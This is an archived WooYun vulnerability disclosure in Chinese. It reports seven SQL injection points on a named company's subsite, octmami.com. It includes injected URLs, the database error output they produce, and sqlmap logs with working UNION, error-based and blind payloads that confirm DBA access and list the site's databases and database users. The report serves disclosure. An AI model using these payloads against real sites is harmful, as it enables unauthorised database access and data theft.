当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152658

漏洞标题:十月妈咪某站接口文件存在七处SQL注入(DBA权限)

相关厂商:十月妈咪

漏洞作者: 路人甲

提交时间:2015-11-07 21:11

修复时间:2015-12-22 21:12

公开时间:2015-12-22 21:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

对某子站进行测试!~~~发现众多的注入点!~~~因为该子站不稳定,容易掉,需要测试一段时间,然后再测试!~~~
PS:乌云把斜杠+撇组合过滤成斜杠+斜杠了???看到的不是显示出来的样子所以

详细说明:

第一处
有两个
http://corp.octmami.com/ajax_video.php?now_video=8'&type=no_type&times=0.1655799720901996&_=1445346057351
返回错误

Web! info: MySQL Query Error
Time: 2015-11-07 11:05:49
Script: 
SQL: select * from `oc_video` where w_id=8\' order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near '\' order by norder asc' at line 1
Errno: 1064


http://corp.octmami.com/ajax_video.php?now_video=8&type=no_type'&times=0.1655799720901996&_=1445346057351
返回错误

Web! info: MySQL Query Error
Time: 2015-11-07 11:03:44
Script: 
SQL: select * from `oc_video` where typeid=no_type\' w_id=8 order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near '\' w_id=8 order by norder asc' at line 1
Errno: 1064


那么这两个参数均存在注入了!~~~
开始用sqlmap测试!~~~

1.jpg


2.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: type
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: now_video=8&type=-5190 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(
0x7163767271,0x4b797549777567624753,0x716e787371),NULL,NULL,NULL,NULL,NULL#&time
s=0.1655799720901996&_=1445346057351
Place: GET
Parameter: now_video
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: now_video=8 AND 6377=6377&type=no_type&times=0.1655799720901996&_=1
445346057351
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: now_video=8 AND (SELECT 9111 FROM(SELECT COUNT(*),CONCAT(0x71637672
71,(SELECT (CASE WHEN (9111=9111) THEN 1 ELSE 0 END)),0x716e787371,FLOOR(RAND(0)
*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=no_type&times=0.
1655799720901996&_=1445346057351
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: now_video=-5154 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x71637
67271,0x4a645a524f5669585546,0x716e787371),NULL,NULL,NULL,NULL,NULL-- &type=no_t
ype&times=0.1655799720901996&_=1445346057351
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: now_video=8 AND SLEEP(5)&type=no_type&times=0.1655799720901996&_=14
45346057351
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: type, type: Unescaped numeric (default)
[1] place: GET, parameter: now_video, type: Unescaped numeric
[q] Quit
> 1
[19:08:17] [INFO] testing MySQL
[19:08:17] [INFO] confirming MySQL
[19:08:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.6.12
back-end DBMS: MySQL >= 5.0.0
[19:08:18] [INFO] fetching current user
current user:    'oct_crop@%'
[19:08:18] [INFO] fetching current database
current database:    'octmami'
[19:08:18] [INFO] testing if current user is DBA
[19:08:18] [INFO] fetching current user
current user is DBA:    True
database management system users [9]:
[*] ''@'localhost'
[*] 'chen'@'%'
[*] 'ecstore'@'localhost'
[*] 'proftpd'@'%'
[*] 'proftpd'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
available databases [11]:
[*] corp
[*] ecstore
[*] information_schema
[*] mysql
[*] octmami
[*] performance_schema
[*] purchase
[*] server
[*] test
[*] youxi
[*] zentao


测试过程不稳定,容易断掉,就不继续测试了,具体可以参考,是一样的!~~~
WooYun: 十月妈咪某后台系统弱口令并登录后多处存在SQL注入(DBA权限+读取任意文件+大量信息[可能是测试信息])
这里测试过的!~~~
第二处:
http://corp.octmami.com/ajax_video.php?type=4'&times=0.5367835881188512&_=1445345926532
返回错误

Web! info: MySQL Query Error
Time: 2015-11-07 11:27:28
Script: 
SQL: select * from `oc_video` where typeid=4\' order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near '\' order by norder asc' at line 1
Errno: 1064


一样的就不测试了!~~~
第三处
http://corp.octmami.com/ajax_magazine.php?type=3&times=0.38723763078451157&_=1445351065660
返回错误

Web! info: MySQL Query Error
Time: 2015-11-07 11:37:07
Script: 
SQL: select * from `oc_magazine` where typeid=3\' order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near '\' order by norder asc' at line 1
Errno: 1064


下面的就不继续测试了,因为系统不稳定,访问几秒就断了
直接用上次测试的记录吧!~~~
第四处
http://corp.octmami.com/product.php?m=product_list&category=2'

Web! info: MySQL Query Error
Time: 2015-11-07 12:18:35
Script: 
SQL: select * from `oc_product_sort` where s_id=2\'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near '\'' at line 1
Errno: 1064


第五处
http://corp.octmami.com/product.php?m=product&category=2&item=1069'
http://corp.octmami.com/product.php?m=product&category=2'&item=1069

Web! info: MySQL Query Error
Time: 2015-11-07 12:19:30
Script: 
SQL: select * from `oc_product`where name_cn<>"" and p_id=1069\' and ptype=2 order by p_id desc,norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near '\' and ptype=2 order by p_id desc,norder asc' at line 1
Errno: 1064
Web! info: MySQL Query Error
Time: 2015-11-07 12:19:57
Script: 
SQL: select * from `oc_product`where name_cn<>"" and p_id=1069 and ptype=2\' order by p_id desc,norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near '\' order by p_id desc,norder asc' at line 1
Errno: 1064


第六处
http://corp.octmami.com/classroom.php?page=214&item=60'

Web! info: MySQL Query Error
Time: 2015-11-07 12:22:06
Script: 
SQL: select * from `oc_wiki_info` where i_id=60\'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right 
syntax to use near '\'' at line 1
Errno: 1064


测试.jpg


第七处
http://corp.octmami.com/ajax_magazine.php?now_magazine=1'&type=no_type&times=0.4457961064763367&_=1446902294075
错误信息返回

Web! info: MySQL Query Error
Time: 2015-11-07 17:24:06
Script: 
SQL: select * from `oc_magazine` where id=1\' order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by norder asc' at line 1
Errno: 1064


http://corp.octmami.com/ajax_magazine.php?type=4'&times=0.9216494632419199&_=1446902299660
错误信息返回

Web! info: MySQL Query Error
Time: 2015-11-07 18:12:30
Script: 
SQL: select * from `oc_magazine` where typeid=4\' order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by norder asc' at line 1
Errno: 1064


半夜测试的,发现时间对不上,系统时间设置不一样?

corp1.jpg


corp2.jpg


sqlmap测试

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: type
    Type: UNION query
    Title: MySQL UNION query (69) - 8 columns
    Payload: now_magazine=1&type=-3688 UNION ALL SELECT 69,69,69,69,69,CONCAT(0x
7166757971,0x4b6665667a7575427358,0x7173657771),69,69#&times=0.4457961064763367&
_=1446902294075
Place: GET
Parameter: now_magazine
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: now_magazine=1 AND (SELECT 2251 FROM(SELECT COUNT(*),CONCAT(0x71667
57971,(SELECT (CASE WHEN (2251=2251) THEN 1 ELSE 0 END)),0x7173657771,FLOOR(RAND
(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=no_type&times
=0.4457961064763367&_=1446902294075
---
there were multiple injection points, please select the one to use for following
 injections:
[0] place: GET, parameter: type, type: Unescaped numeric (default)
[1] place: GET, parameter: now_magazine, type: Unescaped numeric
[q] Quit
> 1
[01:25:15] [INFO] testing MySQL
[01:25:15] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:25:15] [WARNING] if the problem persists please try to lower the number of u
sed threads (option '--threads')
[01:25:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[01:25:18] [WARNING] reflective value(s) found and filtering out
[01:25:18] [INFO] confirming MySQL
[01:25:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.6.12
back-end DBMS: MySQL >= 5.0.0
[01:25:18] [INFO] fetching current user
[01:25:19] [INFO] retrieved: oct_crop@%
current user:    'oct_crop@%'
[01:25:19] [INFO] fetching current database
[01:25:19] [INFO] retrieved: octmami
current database:    'octmami'
[01:25:19] [INFO] testing if current user is DBA
[01:25:19] [INFO] fetching current user
current user is DBA:    True


corp3.jpg


corp4.jpg


还是太慢了,时而连上时而断开,就不继续了!~~~

漏洞证明:

如上

修复方案:

过滤修复

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)